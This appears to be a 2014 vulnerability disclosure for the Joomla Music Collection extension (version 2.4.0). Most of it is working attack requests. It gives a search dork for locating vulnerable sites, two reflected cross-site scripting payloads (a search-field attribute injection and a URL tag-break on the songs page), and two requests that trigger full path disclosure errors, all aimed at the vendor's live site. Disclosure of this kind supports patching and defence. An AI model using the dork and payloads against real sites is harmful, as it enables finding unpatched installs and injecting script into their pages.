#Title: Joomla Music Collection - XSS & FPD #Version: 2.4.0 (Latest ATM) - extensions.joomla.org/extensions/multimedia/multimedia-players/audio-players-a-gallery/7750 #Dork: inurl:com_muscol #Vendor: JoomlaThat! - www.joomlathat.com #Date: 01.24.2014 #Contact: smash[at]devilteam.pl 1. Cross Site Scripting - Search Bar Request: GET /?searchword=666"%20onmouseover=alert(666)%20bad="&genre_id=&type_id=&tag_id=&option=com_muscol&search=albums&view=search&Itemid=126&orderby=year_asc&limit=20&limitstart=0 HTTP/1.1 Host: www.joomlathat.com Injection point: </span><input type="text" class="inputbox " name="searchword" id="keyword_search_input" size="13" maxlength="255" placeholder="Search songs..." value="666" onmouseover=alert(1) bad=""/> 2. Full Path Disclosure - Download this song Request: www.joomlathat.com/index.php?option=com_muscol&view=file&format[]=raw&id=666&Itemid=666 Response: Fatal error: Call to undefined method JException::setModel() in /home/joomlathat/www/libraries/joomla/application/component/controller.php on line 683 3. Full Path Disclosure - Search Bar Request: www.joomlathat.com/demo/music-collection/search?search=666&genre_id= Response: Fatal error: Call to a member function getListFooter() on a non-object in /home/joomlathat/www/components/com_muscol/views/search/tmpl/common.php on line 27 4. Cross Site Scripting - Songs Page Request: www.joomlathat.com/demo/music-collection/b/b-b-king-eric-clapton/songs/page-2%22%3ESUP%3C!-- Injection point (line 223): <meta property="og:url" content="http://www.joomlathat.com/demo/music-collection/b/b-b-king-eric-clapton/songs/page-2">SUP<!--" />